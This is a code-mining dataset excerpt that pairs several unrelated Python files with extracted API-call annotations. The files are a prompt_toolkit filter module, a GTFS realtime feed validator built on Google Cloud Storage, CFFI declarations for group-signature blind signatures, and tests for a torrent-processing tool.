'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2310, 2312), False, 'import sys\n'), ((2484, 2544), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Invalid credentials"""'}), "(status_code=401, detail='Invalid credentials')\n", (2497, 2544), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((3252, 3270), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (3268, 3270), False, 'import sys\n'), ((3327, 3382), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Email is taken"""'}), "(status_code=401, detail='Email is taken')\n", (3340, 3382), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((7275, 7284), 'hipotap_common.proto_messages.order_pb2.OrderPB', 'OrderPB', ([], {}), '()\n', (7282, 7284), False, 'from hipotap_common.proto_messages.order_pb2 import GetOrderRequestPB, OrderPB, OrderPaymentRequestPB, OrderRequestPB, OrderListRequestPB\n'), ((7348, 7458), 'google.protobuf.json_format.MessageToDict', 'json_format.MessageToDict', (['order_pb'], {'preserving_proto_field_name': '(True)', 'including_default_value_fields': '(True)'}), '(order_pb, preserving_proto_field_name=True,\n including_default_value_fields=True)\n', (7373, 7458), False, 'from google.protobuf import json_format\n'), ((7526, 7585), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Cannot order offer"""'}), "(status_code=401, detail='Cannot order offer')\n", (7539, 7585), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((9121, 9178), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(401)', 'detail': '"""Cannot pay order"""'}), "(status_code=401, detail='Cannot pay order')\n", (9134, 9178), False, 'from fastapi import FastAPI, Form, HTTPException, Request\n'), ((9905, 9912), 'queue.Queue', 'Queue', ([], {}), '()\n', (9910, 9912), False, 'from queue import Queue\n'), ((9945, 10004), 'threading.Thread', 'Thread', ([], {'target': 'event_receiving', 'args': "(event_queue, 'offer')"}), "(target=event_receiving, args=(event_queue, 'offer'))\n", (9951, 10004), False, 'from threading import Thread\n'), ((11251, 11258), 'queue.Queue', 'Queue', ([], {}), '()\n', (11256, 11258), False, 'from queue import Queue\n'), ((11291, 11350), 'threading.Thread', 'Thread', ([], {'target': 'event_receiving', 'args': "(event_queue, 'order')"}), "(target=event_receiving, args=(event_queue, 'order'))\n", (11297, 11350), False, 'from threading import Thread\n'), ((6200, 6250), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date_start', '"""%Y-%m-%d"""'], {}), "(date_start, '%Y-%m-%d')\n", (6226, 6250), False, 'import datetime\n'), ((6335, 6383), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date_end', '"""%Y-%m-%d"""'], {}), "(date_end, '%Y-%m-%d')\n", (6361, 6383), False, 'import datetime\n'), ((10703, 10738), 'asyncio.sleep', 'asyncio.sleep', (['MESSAGE_STREAM_DELAY'], {}), '(MESSAGE_STREAM_DELAY)\n', (10716, 10738), False, 'import asyncio\n'), ((12049, 12084), 'asyncio.sleep', 'asyncio.sleep', (['MESSAGE_STREAM_DELAY'], {}), '(MESSAGE_STREAM_DELAY)\n', (12062, 12084), False, 'import asyncio\n')]
|
from __future__ import unicode_literals
from inspect import ArgSpec
from six import with_metaclass
__all__ = (
'CLIFilter',
'SimpleFilter',
'check_signatures_are_equal',
)
class _FilterTypeMeta(type):
def __instancecheck__(cls, instance):
if not hasattr(instance, 'getargspec'):
return False
arguments = _drop_self(instance.getargspec())
return arguments.args == cls.arguments_list or arguments.varargs is not None
class _FilterType(with_metaclass(_FilterTypeMeta)):
def __new__(cls):
raise NotImplementedError('This class should not be initiated.')
class CLIFilter(_FilterType):
"""
Abstract base class for filters that accept a
:class:`~prompt_toolkit.interface.CommandLineInterface` argument. It cannot
be instantiated, it's only to be used for instance assertions, e.g.::
isinstance(my_filter, CliFilter)
"""
arguments_list = ['cli']
class SimpleFilter(_FilterType):
"""
Abstract base class for filters that don't accept any arguments.
"""
arguments_list = []
def _drop_self(spec):
"""
Take an argspec and return a new one without the 'self'.
"""
args, varargs, varkw, defaults = spec
if args[0:1] == ['self']:
args = args[1:]
return ArgSpec(args, varargs, varkw, defaults)
def check_signatures_are_equal(lst):
"""
Check whether all filters in this list have the same signature.
Raises `TypeError` if not.
"""
spec = _drop_self(lst[0].getargspec())
for f in lst[1:]:
if _drop_self(f.getargspec()) != spec:
raise TypeError('Trying to chain filters with different signature: %r and %r' %
(lst[0], f))
|
[
"inspect.ArgSpec",
"six.with_metaclass"
] |
[((490, 521), 'six.with_metaclass', 'with_metaclass', (['_FilterTypeMeta'], {}), '(_FilterTypeMeta)\n', (504, 521), False, 'from six import with_metaclass\n'), ((1294, 1333), 'inspect.ArgSpec', 'ArgSpec', (['args', 'varargs', 'varkw', 'defaults'], {}), '(args, varargs, varkw, defaults)\n', (1301, 1333), False, 'from inspect import ArgSpec\n')]
|
__version__ = "0.0.1"
import os
import json
import subprocess
import shutil
import pandas as pd
import argh
from tempfile import TemporaryDirectory, NamedTemporaryFile
from pathlib import Path
from collections import defaultdict
RT_BUCKET_FOLDER="gs://gtfs-data/rt"
RT_BUCKET_PROCESSED_FOLDER="gs://gtfs-data/rt-processed"
SCHEDULE_BUCKET_FOLDER="gs://gtfs-data/schedule"
# Note that the final {extraction_date} is needed by the validator, which may read it as
# timestamp data. Note that the final datetime requires Z at the end, to indicate
# it's a ISO instant
RT_FILENAME_TEMPLATE="{extraction_date}__{itp_id}__{url_number}__{src_fname}__{extraction_date}Z.pb"
N_THREAD_WORKERS = 30
try:
JAR_PATH = os.environ["GTFS_VALIDATOR_JAR"]
except KeyError:
raise Exception("Must set the environment variable GTFS_VALIDATOR_JAR")
# Utility funcs ----
def json_to_newline_delimited(in_file, out_file):
data = json.load(open(in_file))
with open(out_file, "w") as f:
f.write("\n".join([json.dumps(record) for record in data]))
def parse_pb_name_data(file_name):
"""Returns data encoded in extraction files, such as datetime or itp id.
>>> parse_pb_name_data("2021-01-01__1__0__filename__etc")
{'extraction_date': '2021-01-01', 'itp_id': 1, 'url_number': 0, 'src_fname': 'filename'}
"""
extraction_date, itp_id, url_number, src_fname, *_ = Path(file_name).name.split("__")
return dict(
extraction_date = extraction_date,
itp_id = int(itp_id),
url_number = int(url_number),
src_fname = src_fname)
def build_pb_validator_name(extraction_date, itp_id, url_number, src_fname):
"""Return name for file in the format needed for validation.
Note that the RT validator needs to use timestamps at the end of the filename,
so this function ensures they are present.
"""
return RT_FILENAME_TEMPLATE.format(
extraction_date=extraction_date,
itp_id=itp_id,
url_number=url_number,
src_fname=src_fname
)
# Validation ==================================================================
def gather_results(rt_path):
# TODO: complete functionality to unpack results into a DataFrame
# Path(rt_path).glob("*.results.json")
raise NotImplementedError()
def validate(gtfs_file, rt_path, verbose=False):
if not isinstance(gtfs_file, str):
raise NotImplementedError("gtfs_file must be a string")
stderr = subprocess.DEVNULL if not verbose else None
stdout = subprocess.DEVNULL if not verbose else None
subprocess.check_call([
"java",
"-jar", JAR_PATH,
"-gtfs", gtfs_file,
"-gtfsRealtimePath", rt_path,
"-sort", "name",
], stderr=stderr, stdout=stdout)
def validate_gcs_bucket(
project_id, token, gtfs_schedule_path, gtfs_rt_glob_path=None,
out_dir=None, results_bucket=None, verbose=False, aggregate_counts=False,
):
"""
Fetch and validate GTFS RT data held in a google cloud bucket.
Parameters:
project_id: name of google cloud project.
token: token argument passed to gcsfs.GCSFileSystem.
gtfs_schedule_path: path to a folder holding unpacked GTFS schedule data.
gtfs_rt_glob_path: path that GCSFileSystem.glob can uses to list all RT files.
Note that this is assumed to have the form {datetime}/{itp_id}/{url_number}/filename.
out_dir: a directory to store fetched files and results in.
results_bucket: a bucket path to copy results to.
verbose: whether to print helpful messages along the way.
Note that if out_dir is unspecified, the validation occurs in a temporary directory.
"""
import gcsfs
fs = gcsfs.GCSFileSystem(project_id, token=token)
if not out_dir:
tmp_dir = TemporaryDirectory()
tmp_dir_name = tmp_dir.name
else:
tmp_dir = None
tmp_dir_name = out_dir
if results_bucket and not aggregate_counts and results_bucket.endswith("/"):
results_bucket = f"{results_bucket}/"
final_json_dir = Path(tmp_dir_name) / "newline_json"
try:
print("Fetching data")
dst_path_gtfs = f"{tmp_dir_name}/gtfs"
dst_path_rt = f"{tmp_dir_name}/rt"
# fetch and zip gtfs schedule
download_gtfs_schedule_zip(gtfs_schedule_path, dst_path_gtfs, fs)
# fetch rt data
if gtfs_rt_glob_path is None:
raise ValueError("One of gtfs rt glob path or date must be specified")
download_rt_files(dst_path_rt, fs, glob_path = gtfs_rt_glob_path)
print("Validating data")
validate(f"{dst_path_gtfs}.zip", dst_path_rt, verbose=verbose)
if results_bucket and aggregate_counts:
print(f"Saving aggregate counts as: {results_bucket}")
error_counts = rollup_error_counts(dst_path_rt)
df = pd.DataFrame(error_counts)
with NamedTemporaryFile() as tmp_file:
df.to_parquet(tmp_file.name)
fs.put(tmp_file.name, results_bucket)
elif results_bucket and not aggregate_counts:
# validator stores results as {filename}.results.json
print(f"Putting data into results bucket: {results_bucket}")
# fetch all results files created by the validator
all_results = list(Path(dst_path_rt).glob("*.results.json"))
final_json_dir.mkdir(exist_ok=True)
final_files = []
for result in all_results:
# we appended a final timestamp to the files so that the validator
# can use it to order them during validation. here, we remove that
# timestamp, so we can use a single wildcard to select, eg..
# *trip_updates.results.json
result_out = "__".join(result.name.split("__")[:-1])
json_to_newline_delimited(result, final_json_dir / result_out)
final_files.append(final_json_dir / result_out)
fs.put(final_files, results_bucket)
except Exception as e:
raise e
finally:
if isinstance(tmp_dir, TemporaryDirectory):
tmp_dir.cleanup()
def validate_gcs_bucket_many(
project_id, token, param_csv,
results_bucket=None, verbose=False, aggregate_counts=False,
status_result_path=None, strict=False, result_name_prefix="result_"
):
"""Validate many gcs buckets using a parameter file.
Additional Arguments:
strict: whether to raise an error when a validation fails
status_result_path: directory for saving the status of validations
result_name_prefix: a name to prefix to each result file name. File names
will be numbered. E.g. result_0.parquet, result_1.parquet for two feeds.
Param CSV should contain the following fields (passed to validate_gcs_bucket):
* gtfs_schedule_path
* gtfs_rt_glob_path
The full parameters CSV is dumped to JSON with an additional column called
is_status, which reports on whether or not the validation was succesfull.
"""
import gcsfs
required_cols = ["gtfs_schedule_path", "gtfs_rt_glob_path"]
fs = gcsfs.GCSFileSystem(project_id, token=token)
params = pd.read_csv(fs.open(param_csv))
# check that the parameters file has all required columns
missing_cols = set(required_cols) - set(params.columns)
if missing_cols:
raise ValueError("parameter csv missing columns: %s" % missing_cols)
status = []
for idx, row in params.iterrows():
try:
validate_gcs_bucket(
project_id,
token,
results_bucket=results_bucket + f"/{result_name_prefix}{idx}.parquet",
verbose=verbose,
aggregate_counts=aggregate_counts,
**row[required_cols]
)
status.append({**row, "is_success": True})
except Exception as e:
if strict:
raise e
status.append({**row, "is_success": False})
status_newline_json = "\n".join([json.dumps(record) for record in status])
if status_result_path:
fs.pipe(status_result_path, status_newline_json.encode())
def download_gtfs_schedule_zip(gtfs_schedule_path, dst_path, fs):
# fetch and zip gtfs schedule
fs.get(gtfs_schedule_path, dst_path, recursive=True)
shutil.make_archive(dst_path, "zip", dst_path)
def download_rt_files(dst_dir, fs=None, date="2021-08-01", glob_path=None):
"""Download all files for an GTFS RT feed (or multiple feeds)
If date is specified, downloads daily data for all feeds. Otherwise, if
glob_path is specified, downloads data for a single feed.
Parameters:
date: date of desired feeds to download data from (e.g. 2021-09-01)
glob_path: if specified, the path (including a wildcard) for downloading a
single feed.
"""
if fs is None:
raise NotImplementedError("Must specify fs")
# {date}T{timestamp}/{itp_id}/{url_number}
all_files = fs.glob(glob_path) if glob_path else fs.glob(f"{RT_BUCKET_FOLDER}/{date}*/*/*/*")
to_copy = []
out_feeds = defaultdict(lambda: [])
for src_path in all_files:
dt, itp_id, url_number, src_fname = src_path.split("/")[-4:]
if glob_path:
dst_parent = Path(dst_dir)
else:
# if we are downloading multiple feeds, make each feed a subdir
dst_parent = Path(dst_dir) / itp_id / url_number
dst_parent.mkdir(parents=True, exist_ok=True)
out_fname = build_pb_validator_name(dt, itp_id, url_number, src_fname)
dst_name = str(dst_parent / out_fname)
to_copy.append([src_path, dst_name])
out_feeds[(itp_id, url_number)].append(dst_name)
print(f"Copying {len(to_copy)} files")
src_files, dst_files = zip(*to_copy)
fs.get(list(src_files), list(dst_files))
# Rectangling =================================================================
def rollup_error_counts(rt_dir):
result_files = Path(rt_dir).glob("*.results.json")
code_counts = []
for path in result_files:
metadata = parse_pb_name_data(path)
result_json = json.load(path.open())
for entry in result_json:
code_counts.append({
"calitp_itp_id": metadata["itp_id"],
"calitp_url_number": metadata["url_number"],
"calitp_extracted_at": metadata["extraction_date"],
"rt_feed_type": metadata["src_fname"],
"error_id": entry["errorMessage"]["validationRule"]["errorId"],
"n_occurrences": len(entry["occurrenceList"])
})
return code_counts
# Main ========================================================================
def main():
# TODO: make into simple CLI
result = argh.dispatch_commands([
validate, validate_gcs_bucket
])
if result is not None:
print(json.dumps(result))
if __name__ == "__main__":
main()
|
[
"pandas.DataFrame",
"tempfile.NamedTemporaryFile",
"tempfile.TemporaryDirectory",
"shutil.make_archive",
"argh.dispatch_commands",
"json.dumps",
"collections.defaultdict",
"pathlib.Path",
"gcsfs.GCSFileSystem",
"subprocess.check_call"
] |
[((2582, 2737), 'subprocess.check_call', 'subprocess.check_call', (["['java', '-jar', JAR_PATH, '-gtfs', gtfs_file, '-gtfsRealtimePath', rt_path,\n '-sort', 'name']"], {'stderr': 'stderr', 'stdout': 'stdout'}), "(['java', '-jar', JAR_PATH, '-gtfs', gtfs_file,\n '-gtfsRealtimePath', rt_path, '-sort', 'name'], stderr=stderr, stdout=\n stdout)\n", (2603, 2737), False, 'import subprocess\n'), ((3768, 3812), 'gcsfs.GCSFileSystem', 'gcsfs.GCSFileSystem', (['project_id'], {'token': 'token'}), '(project_id, token=token)\n', (3787, 3812), False, 'import gcsfs\n'), ((7273, 7317), 'gcsfs.GCSFileSystem', 'gcsfs.GCSFileSystem', (['project_id'], {'token': 'token'}), '(project_id, token=token)\n', (7292, 7317), False, 'import gcsfs\n'), ((8492, 8538), 'shutil.make_archive', 'shutil.make_archive', (['dst_path', '"""zip"""', 'dst_path'], {}), "(dst_path, 'zip', dst_path)\n", (8511, 8538), False, 'import shutil\n'), ((9296, 9320), 'collections.defaultdict', 'defaultdict', (['(lambda : [])'], {}), '(lambda : [])\n', (9307, 9320), False, 'from collections import defaultdict\n'), ((10989, 11044), 'argh.dispatch_commands', 'argh.dispatch_commands', (['[validate, validate_gcs_bucket]'], {}), '([validate, validate_gcs_bucket])\n', (11011, 11044), False, 'import argh\n'), ((3852, 3872), 'tempfile.TemporaryDirectory', 'TemporaryDirectory', ([], {}), '()\n', (3870, 3872), False, 'from tempfile import TemporaryDirectory, NamedTemporaryFile\n'), ((4123, 4141), 'pathlib.Path', 'Path', (['tmp_dir_name'], {}), '(tmp_dir_name)\n', (4127, 4141), False, 'from pathlib import Path\n'), ((4924, 4950), 'pandas.DataFrame', 'pd.DataFrame', (['error_counts'], {}), '(error_counts)\n', (4936, 4950), True, 'import pandas as pd\n'), ((8192, 8210), 'json.dumps', 'json.dumps', (['record'], {}), '(record)\n', (8202, 8210), False, 'import json\n'), ((9467, 9480), 'pathlib.Path', 'Path', (['dst_dir'], {}), '(dst_dir)\n', (9471, 9480), False, 'from pathlib import Path\n'), ((10185, 10197), 'pathlib.Path', 'Path', (['rt_dir'], {}), '(rt_dir)\n', (10189, 10197), False, 'from pathlib import Path\n'), ((11105, 11123), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (11115, 11123), False, 'import json\n'), ((1389, 1404), 'pathlib.Path', 'Path', (['file_name'], {}), '(file_name)\n', (1393, 1404), False, 'from pathlib import Path\n'), ((4969, 4989), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {}), '()\n', (4987, 4989), False, 'from tempfile import TemporaryDirectory, NamedTemporaryFile\n'), ((1011, 1029), 'json.dumps', 'json.dumps', (['record'], {}), '(record)\n', (1021, 1029), False, 'import json\n'), ((9596, 9609), 'pathlib.Path', 'Path', (['dst_dir'], {}), '(dst_dir)\n', (9600, 9609), False, 'from pathlib import Path\n'), ((5391, 5408), 'pathlib.Path', 'Path', (['dst_path_rt'], {}), '(dst_path_rt)\n', (5395, 5408), False, 'from pathlib import Path\n')]
|
# file "blindsig_build.py"
from pygroupsig.common_build import ffibuilder
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
void *sig;
} groupsig_blindsig_t;
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
typedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
groupsig_blindsig_init_f init;
groupsig_blindsig_free_f free;
groupsig_blindsig_copy_f copy;
groupsig_blindsig_get_size_f get_size;
groupsig_blindsig_export_f gexport;
groupsig_blindsig_import_f gimport;
groupsig_blindsig_to_string_f to_string;
} groupsig_blindsig_handle_t;
""")
ffibuilder.cdef("""
const groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);
""")
ffibuilder.cdef("""
int groupsig_blindsig_free(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
int groupsig_blindsig_get_size(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_export(
unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_import(
uint8_t code,
unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
char* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);
""")
|
[
"pygroupsig.common_build.ffibuilder.cdef"
] |
[((76, 172), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef struct {\nuint8_t scheme;\nvoid *sig;\n} groupsig_blindsig_t;\n"""'], {}), '(\n """\ntypedef struct {\nuint8_t scheme;\nvoid *sig;\n} groupsig_blindsig_t;\n""")\n', (91, 172), False, 'from pygroupsig.common_build import ffibuilder\n'), ((169, 262), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);\n"""'], {}), '(\n """\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);\n""")\n', (184, 262), False, 'from pygroupsig.common_build import ffibuilder\n'), ((259, 365), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);\n"""\n )\n', (274, 365), False, 'from pygroupsig.common_build import ffibuilder\n'), ((357, 484), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""\n )\n', (372, 484), False, 'from pygroupsig.common_build import ffibuilder\n'), ((476, 581), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);\n"""\n )\n', (491, 581), False, 'from pygroupsig.common_build import ffibuilder\n'), ((573, 804), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,\n uint32_t *size,\n groupsig_blindsig_t *blindsig);\n"""'], {}), '(\n """\ntypedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,\n uint32_t *size,\n groupsig_blindsig_t *blindsig);\n"""\n )\n', (588, 804), False, 'from pygroupsig.common_build import ffibuilder\n'), ((796, 938), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,\n\t\t\t\t\t\t\t uint32_t size);\n"""'], {}), '(\n """\ntypedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,\n\t\t\t\t\t\t\t uint32_t size);\n"""\n )\n', (811, 938), False, 'from pygroupsig.common_build import ffibuilder\n'), ((930, 1043), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);\n"""'], {}), '(\n """\ntypedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);\n"""\n )\n', (945, 1043), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1035, 1378), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ntypedef struct {\nuint8_t scheme;\ngroupsig_blindsig_init_f init;\ngroupsig_blindsig_free_f free;\ngroupsig_blindsig_copy_f copy;\ngroupsig_blindsig_get_size_f get_size;\ngroupsig_blindsig_export_f gexport;\ngroupsig_blindsig_import_f gimport;\ngroupsig_blindsig_to_string_f to_string;\n} groupsig_blindsig_handle_t; \n"""'], {}), '(\n """\ntypedef struct {\nuint8_t scheme;\ngroupsig_blindsig_init_f init;\ngroupsig_blindsig_free_f free;\ngroupsig_blindsig_copy_f copy;\ngroupsig_blindsig_get_size_f get_size;\ngroupsig_blindsig_export_f gexport;\ngroupsig_blindsig_import_f gimport;\ngroupsig_blindsig_to_string_f to_string;\n} groupsig_blindsig_handle_t; \n"""\n )\n', (1050, 1378), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1370, 1488), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nconst groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);\n"""'], {}), '(\n """\nconst groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);\n"""\n )\n', (1385, 1488), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1480, 1568), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ngroupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);\n"""'], {}), '(\n """\ngroupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);\n""")\n', (1495, 1568), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1565, 1643), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_free(groupsig_blindsig_t *sig);\n"""'], {}), '("""\nint groupsig_blindsig_free(groupsig_blindsig_t *sig);\n""")\n', (1580, 1643), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1645, 1759), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""'], {}), '(\n """\nint groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);\n"""\n )\n', (1660, 1759), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1751, 1838), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_get_size(groupsig_blindsig_t *sig);\n"""'], {}), '(\n """\nint groupsig_blindsig_get_size(groupsig_blindsig_t *sig);\n""")\n', (1766, 1838), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1835, 1967), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nint groupsig_blindsig_export(\nunsigned char **bytes, \nuint32_t *size, \ngroupsig_blindsig_t *sig);\n"""'], {}), '(\n """\nint groupsig_blindsig_export(\nunsigned char **bytes, \nuint32_t *size, \ngroupsig_blindsig_t *sig);\n"""\n )\n', (1850, 1967), False, 'from pygroupsig.common_build import ffibuilder\n'), ((1959, 2095), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\ngroupsig_blindsig_t* groupsig_blindsig_import(\nuint8_t code, \nunsigned char *source, \nuint32_t size);\n"""'], {}), '(\n """\ngroupsig_blindsig_t* groupsig_blindsig_import(\nuint8_t code, \nunsigned char *source, \nuint32_t size);\n"""\n )\n', (1974, 2095), False, 'from pygroupsig.common_build import ffibuilder\n'), ((2087, 2177), 'pygroupsig.common_build.ffibuilder.cdef', 'ffibuilder.cdef', (['"""\nchar* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);\n"""'], {}), '(\n """\nchar* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);\n""")\n', (2102, 2177), False, 'from pygroupsig.common_build import ffibuilder\n')]
|
import unittest
from os import listdir
from os.path import basename, dirname, realpath
from shutil import copy2
from tempfile import NamedTemporaryFile, mkdtemp
from trdone.actions import NoAction, CopyAction, UnrarAction
from trdone.processor import Processor
class TestProcessor(unittest.TestCase):
def test_process_file_when_it_is_a_directory(self):
processor = Processor(None, None)
source = mkdtemp()
action = processor._process_file(source, None)
self.assertEquals(action, NoAction(source, None))
def test_process_file_when_it_is_a_file(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile()
action = processor._process_file(torrent.name, destination)
self.assertEquals(action, CopyAction(torrent.name, destination))
def test_process_file_when_it_is_an_archive(self):
destination = 'destination'
processor = Processor(None, destination)
torrent = NamedTemporaryFile(suffix='.rar')
action = processor._process_file(torrent.name, destination)
self.assertEquals(action, UnrarAction(torrent.name, destination))
def test_process(self):
destination = mkdtemp()
torrent = mkdtemp()
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(torrent, destination)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_process_when_paths_are_mapped(self):
destination = mkdtemp()
torrent_base = mkdtemp()
torrent = mkdtemp(dir=torrent_base)
path_mapping = {'some_base': torrent_base}
ignored_dir = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
rar_file = NamedTemporaryFile(suffix='.rar', dir=torrent)
processor = Processor(self._build_path('some_base', basename(torrent)), destination, path_mapping)
processor.process()
self.assertTrue(len(processor.actions) == 3)
new_torrent_dir = self._build_path(destination, torrent)
self.assertTrue(NoAction(ignored_dir, new_torrent_dir) in processor.actions)
self.assertTrue(CopyAction(some_file.name, new_torrent_dir) in processor.actions)
self.assertTrue(UnrarAction(rar_file.name, new_torrent_dir) in processor.actions)
def test_execute(self):
pwd = dirname(realpath(__file__))
destination = mkdtemp()
torrent = mkdtemp()
copy2(self._build_path(pwd, 'file.rar'), torrent)
_ = mkdtemp(prefix='ignored_dir', dir=torrent)
some_file = NamedTemporaryFile(prefix='some_file', dir=torrent)
_ = torrent + '/file.rar'
processor = Processor(torrent, destination)
processor.process()
processor.execute()
new_torrent_dir = listdir(self._build_path(destination, torrent))
self.assertTrue(basename(torrent) in listdir(destination))
self.assertTrue(basename(some_file.name) in new_torrent_dir)
self.assertTrue('file.txt' in new_torrent_dir)
self.assertTrue('file.rar' not in new_torrent_dir)
@staticmethod
def _build_path(destination, torrent):
return destination + '/' + basename(torrent)
|
[
"tempfile.NamedTemporaryFile",
"os.path.basename",
"trdone.actions.UnrarAction",
"trdone.processor.Processor",
"os.path.realpath",
"tempfile.mkdtemp",
"trdone.actions.NoAction",
"os.listdir",
"trdone.actions.CopyAction"
] |
